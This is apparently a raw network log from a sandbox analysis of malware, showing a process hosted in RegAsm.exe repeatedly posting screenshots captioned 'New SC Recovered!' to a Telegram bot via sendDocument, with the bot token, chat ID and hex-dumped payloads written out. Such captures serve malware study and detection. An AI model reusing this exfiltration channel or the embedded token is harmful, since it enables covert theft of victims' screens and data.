                                                2024-05-24 05:43:21 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:21 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:21 UTC1165OUTData Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:21 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 30 63 64 31 65 35 65 34 65 38 33 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc90cd1e5e4e83--
                                                2024-05-24 05:43:21 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:21 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749710149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:37 UTC238OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9817b6b6812f
                                                Host: api.telegram.org
                                                Content-Length: 70703
                                                Expect: 100-continue


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749711149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:38 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9a12c02f0750
                                                Host: api.telegram.org
                                                Content-Length: 70703
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:38 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:38 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 61 31 32 63 30 32 66 30 37 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 61 31 32 63 30 32 66 30 37 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 31 2f 32 30 32 34 20 32 31 3a 31 34 3a 30 38 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9a12c02f0750Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9a12c02f0750Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/01/2024 21:14:08User
                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:38 UTC16355OUTData Raw: 9f 13 ff 00 c8 df 71 fe e2 7f e8 22 bd 1a bc e7 c4 ff 00 f2 37 dc 7f b8 9f fa 08 ae ac 27 f1 51 c5 8e fe 03 2a d1 45 15 ee 9f 32 14 51 45 03 0a 28 a2 80 0a 4a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 00 94 51 45 30 0a 28 a4 a0 62 d2 51 45 00 14 51 45 00 14 94 b4 94 c6 14 51 45 00 14 51 49 40 0b 49 4b 49 40 05 14 51 4c 62 51 45 14 00 51 45 14 00 52 51 45 00 14 51 45 31 85 14 51 40 05 25 2d 25 00 28 ea 2b 4e 7f f5 c7 f0 fe 55 97 de b4 e6 ff 00 5a 7e 83 f9 56 52 dd 0d 6e 32 8a 29 33 41 42 d1 49 45 00 2d 25 14 50 01 45 14 53 18 52 52 d1 40 09 45 14 50 01 41 a2 8a 00 6c bf f1 ed 37 fb bf d6 ab d9 ff 00 ac 6f a5 58 97 fe 3d e6 ff 00 77 fa d5 7b 3f f5 8d f4 a6 b6 60 5a a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 c5 a2 92 8a 00 5a 29 28 a0 42 d1 45 14 00 51
                                                Data Ascii: q"7'Q*E2QE(J(((QEQE0(bQEQEQEQI@IKI@QLbQEQERQEQE1Q@%-%(+NUZ~VRn2)3ABIE-%PESRR@EPAl7oX=w{?`Z)QEQERQ@Z)(BEQ
                                                2024-05-24 05:43:38 UTC15447OUTData Raw: 4a 00 eb 28 a3 22 8c d4 1e 09 ab e1 df f8 ff 00 93 fe b9 1f e6 2b 7a e0 fe e5 bf 0f e7 5c d6 8f 77 1d ad e1 69 49 0a cb b7 3e 9c 8f f0 ad ad 52 e8 41 68 92 a8 0e 19 c0 18 3e c6 be 67 34 a3 52 78 94 a2 b7 5a 1f 53 95 56 a7 4f 0a dc 9e cf 51 e9 53 2f 23 07 91 58 6b ad 63 fe 5d ff 00 f1 ff 00 fe b5 48 35 ec 7f cb b7 fe 3f ff 00 d6 ae 25 95 e2 ff 00 93 f1 5f e6 76 3c d7 09 fc ff 00 83 ff 00 23 1e 93 8a 4a 2b ec cf 8a b0 b9 14 66 92 8a 00 5c d6 3d f7 17 ae 48 cf 4e bd f8 ad 7a 47 fb 8d f4 ae 6c 55 1f 6d 4e d7 b5 b5 37 c3 cf 92 7e ba 15 a6 f1 05 ec b7 96 97 2a 22 8b ec 83 6c 51 c6 08 40 3b f1 9e e3 8a a5 7d 74 fa 85 f4 97 0d 14 69 24 a7 25 62 04 02 7e 84 9e b5 eb b4 57 81 ca 7d 2b c3 37 bc 8c d9 b4 2d 32 7d 48 6a 32 db 6e ba 0c ae 24 de c3 95 c6 38 ce 3b 0a 4d
                                                Data Ascii: J("+z\wiI>RAh>g4RxZSVOQS/#Xkc]H5?%_v<#J+f\=HNzGlUmN7~*"lQ@;}ti$%b~W}+7-2}Hj2n$8;M
                                                2024-05-24 05:43:38 UTC5117OUTData Raw: d4 bf bd f8 1d 75 25 72 54 51 f5 ef ee fe 3f f0 03 ea 7f de fc 0e b6 92 b9 3a 28 fa f7 f7 7f 1f f8 03 fa 9f f7 bf 03 ac a2 b9 3a 28 fa f7 f7 7f 1f f8 01 f5 3f ef 7e 07 57 45 72 94 51 f5 ef ee fe 3f f0 03 ea 7f de fc 0e a8 d1 5c ad 14 7d 7b fb bf 8f fc 01 fd 4f fb df 81 d5 52 57 2d 45 1f 5e fe ef e3 ff 00 00 3e a9 fd e3 a9 a4 ae 5a 8a 3e bd fd df c7 fe 00 7d 53 fb c7 53 49 5c bd 14 7d 7b fb bf 8f fc 01 fd 53 cc ea 28 ae 5e 8a 3e bd fd df c7 fe 00 7d 53 cc e9 e8 35 cc 00 49 c0 19 35 7e 4d 13 57 89 d1 24 d2 af 51 a4 ce c0 d6 ee 0b 60 64 e3 8e 78 a3 eb df dd fc 7f e0 07 d5 3c cd 8a 2b 9b 58 65 68 5e 65 89 cc 48 40 67 0a 76 a9 3d 01 3e f8 35 3d c6 9b 7f 6b 6e 97 17 36 37 30 c2 f8 db 24 91 32 ab 67 91 82 46 0d 1f 5e fe ef e3 ff 00 00 7f 55 f3 37 28 ae 66 8a 3e
                                                Data Ascii: u%rTQ?:(:(?~WErQ?\}{ORW-E^>Z>}SSI\}{S(^>}S5I5~MW$Q`dx<+Xeh^eH@gv=>5=kn670$2gF^U7(f>
                                                2024-05-24 05:43:38 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 61 31 32 63 30 32 66 30 37 35 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9a12c02f0750--
                                                2024-05-24 05:43:39 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:38 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749712149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:39 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9c148a05a466
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:43:39 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:43:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 34 2f 32 30 32 34 20 31 30 3a 32 32 3a 30 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9c148a05a466Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9c148a05a466Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/04/2024 10:22:00User
                                                2024-05-24 05:43:39 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:43:39 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:43:39 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:43:39 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:43:39 UTC1165OUTData Raw: a8 ac 1a 2a 65 15 25 66 44 e0 a6 ac cf 4c d3 75 3b bb 96 da f7 9b 60 41 97 90 ed 07 1e 9b ba fe b5 95 e2 af 13 c1 25 ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 72 3c 1a 9d 55 52 a3 bd b6 46 d4 a6 e9 53 70 5d 7a 85 14 51 5d c4 05 6b e9 1a a2 c0 9f 67 9c e1 3f 85 bd 3d a9 90 f8 73 57 9e 14 9a 3b 4d d1 c8 a1 94 f9 88 32 0f 23 bd 3f fe 11 7d 6b fe 7c bf f2 2a 7f 8d 29 53 72 56 68 ce 7c 92 56 6c eb f4 cd 52 f2 66 48 62 bb 1e 5f f7 f0 a4 aa fb 31 e4 54 7e 22 f1 45 b5 a5 a3 db 59 4c 26 b9 60 57 72 9c 84 f7 cf 73 5c a7 fc 22 fa d7 fc f9 7f e4 54 ff 00 1a 3f e1 17 d6 bf e7 cb ff 00 22 a7 f8 d7 1c f0 0e ac d4 aa 36 d2 e8 6b 42 aa a3 17 14 f5 7d 4c 7a 2b 48 68 3a a3 00 45 af 07 9f be bf e3 59 f2 c6 f1 4a f1 48 30 e8 4a b0 f4 22 bb 5a 68 49 a6 36 8a 28 a0 61 45
                                                Data Ascii: *e%fDLu;`A%XH$2I"zEr<URFSp]zQ]kg?=sW;M2#?}k|*)SrVh|VlRfHb_1T~"EYL&`Wrs\"T?"6kB}Lz+Hh:EYJH0J"ZhI6(aE
                                                2024-05-24 05:43:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 63 31 34 38 61 30 35 61 34 36 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc9c148a05a466--
                                                2024-05-24 05:43:39 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:43:39 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749713149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:43:42 UTC238OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc9ece9c66b2c0
                                                Host: api.telegram.org
                                                Content-Length: 66751
                                                Expect: 100-continue
                                                2024-05-24 05:43:42 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 63 65 39 63 36 36 62 32 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 30 37 2f 32 30 32 34 20 32 31 3a 33 38 3a 35 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc9ece9c66b2c0Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc9ece9c66b2c0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/07/2024 21:38:53User
